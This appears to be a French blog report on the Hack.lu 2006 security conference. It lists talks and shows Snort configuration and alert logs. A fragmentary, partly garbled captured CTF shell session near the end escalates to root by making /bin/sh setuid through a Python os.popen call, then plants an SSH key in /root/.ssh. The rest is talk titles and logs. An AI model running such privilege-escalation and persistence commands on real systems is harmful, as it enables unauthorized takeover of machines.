Table of Contents

Moi aussi j'étais à la Hack.lu !

19 octobre

Tactical VoIP: VoIPhreaking

Conclusion de cette première journée

20 octobre

# arpspoof
#----------------------------------------
# Experimental ARP detection code from Jeff Nathan, detects ARP attacks,
# unicast ARP requests, and specific ARP mapping monitoring.
#  SID     Event description
# -----   -------------------
#   1       Unicast ARP request
#   2       Etherframe ARP mismatch (src)
#   3       Etherframe ARP mismatch (dst)
#   4       ARP cache overwrite attack
preprocessor arpspoof_detect_host: 192.168.1.235 f0:0f:00:f0:0f:00

Opening Speech (Renaud Deraison)

Towards an Invisible Honeypot Monitoring System (Nguyen Anh Quynh)

10:40 Refreshment Break

An empirical analysis of malware (Oliver Schmid)

Sensible defence (Koen Maris)

12:40 Lunch Break

13:30 Lightning talks

Bluetooth Hacking revisited (Thierry Zoller & Kevin Finistere)

Triple Play; Triple threats ? - IPTV Security (Yen-Ming Chen)

15:40 Refreshment Break

IPv6 Security and insecurity (Van Hauser)

Smashing Heap by Free Simulation (Sandip Chaudhari)

DNS Security (Daniel Karrenberg)

CTF

Repas à la Coque

21 octobre

CTF

Software Engineering Security (Wietse Venema)

Security in Grid Computing (Lisa Thalheim)

Secure networking (Hannes Mehnert, Andreas Bogk)

WiFi Advanced Stealth (Laurent Butti & Franck Veysset)

Lunch Break

Lightning talks

Exploiting hidden services to setup anonymous communication infrastructure (Fabio Pietrosanti)

Broadcasting by Misuse of Satellite ISPs (Andre Adelsbach)

Pendant ce temps, au CTF...

How to find anything underneath the commercial web: Powersearching without google (Fravia)

Web Hackers vs Search Engines and more... (Laurent Oudot)

Packets found in the Air...

MSN

Oct 20 11:18:33 localhost snort: [1:2001682:5] BLEEDING-EDGE Policy MSN IM Poll via HTTP
<snip>
Oct 20 11:23:46 localhost snort: [1:2001674:2] BLEEDING-EDGE Proxy POST Request 
Oct 20 11:23:47 localhost snort: [1:2001674:2] BLEEDING-EDGE Proxy POST Request 
Oct 20 11:23:49 localhost snort: [1:2001674:2] BLEEDING-EDGE Proxy POST Request 
Et caetera ad nauseam...
CVR 2 0x0409 winnt 5.1 i386 MSNMSGR 6.0.0602 MSMSGS guillaume@sky.fr
POST http://207.46.107.56/gateway/gateway.dll?SessionID=881200207.17625 HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: MSMSGS
Host: 207.46.107.56
Proxy-Connection: Keep-Alive
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-msn-messenger
Content-Length: 30

TOR

Oct 20 11:38:12 localhost snort: [1:2002952:2] BLEEDING-EDGE POLICY TOR 1.0 Inbound Circuit Traffic
Oct 20 11:38:12 localhost snort: [1:2002953:2] BLEEDING-EDGE POLICY TOR 1.0 Outbound Circuit Traffic
Oct 20 11:38:12 localhost snort: [1:2001728:4] BLEEDING-EDGE POLICY TOR 1.0 Client Circuit Traffic
<snip>
Oct 20 12:15:42 localhost snort: [1:2002951:2] BLEEDING-EDGE POLICY TOR 1.0 Status Update
Oct 20 12:15:54 localhost snort: [1:2002950:2] BLEEDING-EDGE POLICY TOR 1.0 Server Key Retrival

Trafic chiffré

Oct 20 11:47:31 localhost snort: [1:2003020:5] BLEEDING-EDGE POLICY TLS/SSL Encrypted 
Application Data on Unusual Port

Scans

Oct 20 12:13:30 localhost snort: [122:19:0] (portscan) UDP Portsweep {PROTO255} 
192.168.1.x -> 192.168.1.1
Oct 20 16:38:37 iBook snort: [1:2001219:13] BLEEDING-EDGE Potential SSH Scan
Oct 20 16:38:37 iBook snort: [1:2003068:1] BLEEDING-EDGE Potential SSH Scan OUTBOUND
Oct 20 16:40:04 iBook snort: [1:2001219:13] BLEEDING-EDGE Potential SSH Scan
Oct 20 16:40:04 iBook snort: [1:2003068:1] BLEEDING-EDGE Potential SSH Scan OUTBOUND

Le CTF depuis la coulisse

NMAP

Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:636
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:636
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:1723
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:1723
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:25
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:113
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:113
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:23
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:23
Oct 20 16:56:20  [122:1:0] (portscan) TCP Portscan {PROTO255} a.b.c.d -> 192.168.1.235
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:443
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:443
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:21
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:21
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:389
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:389
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:27491
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:27491
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:30119
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:30119
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:47162
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:47162
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:23652
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:23652
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:50291
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:50291
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:36461
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:36461
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:27767
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:27767
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:46671
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:46671
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:36150
Oct 20 16:56:20  [1:2000545:3]  SCAN NMAP -f -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:36150
Oct 20 16:56:20  [1:2000537:3]  SCAN NMAP -sS  {TCP} a.b.c.d:50326 -> 192.168.1.235:59165

Bacon

AUTH:team2:Claus
OK
bacon:........................

Crack...

ls;
touch /tmp/ttt;
chsh /bin/sh;
chsh: unknown user: /bin/sh
chsh -s /bin/sh;
chsh: /usr/sbin/nologin: curre
chsh -s /usr/local/bin/bash;
chsh: /usr/sbin/nologin: current shels /;
COPYRIGHT
bin
boot
cdrom
compa
cd /home
ls
breakme
ctf
hackerjoe
kenshoto
ls -l
total 124
drwxr-xr-x  2 breakm3
drwxr-xr-x  2 team4      tea
ls -R
ls: ctf: Permission denied
ls: team21: Permission denied
cd /home
ls -l stage7
total 16
-rw-r-----  1 root  
ls
cd stage7
ls
key
stage7
date
Sat Oct 21 07:03:36 EDT 2006
date --help
date: illegal option -- -
usage: date [-jnu] [-d dst] [-
date Sat Oct 21 07:03:36 EDT 2date: illegal time format
usage: datdate "Sat Oct 21 07:03:36 EDT date: illegal time format
usagtime 
id
uid=1005(team2) gid=1100(teamssh
ls
ls /
COPYRIGHT
bin
boot
cdrom
compa
exit
ls /
COPYRIGHT
bin
boot
cdrom
compacd /tmp
echo 'import os' > .x2
echo 'out=os.popen("chmod +s /echo >> .x2
cat .x2
import os
out=os.popen("chmod /usr/local/bin/python.hack .x2ls -l /bin/sh
-r-sr-sr-x  1 root  wheel  106/bin/sh
id
uid=1005(team2) euid=0(root) g
chmod -s /bin/sh
cd /root/.ssh
ls
known_hosts
cat /etc/ssh/sshd_config
#	$OpenBSD: sshd_config,v 1.68 for
# RhostsRSAAuthentication
pwd
/root/.ssh
echo ssh-rsa AAAAB3NzaC1yc2EAA
666 You Totally Suck Turnips

Conclusion

Liens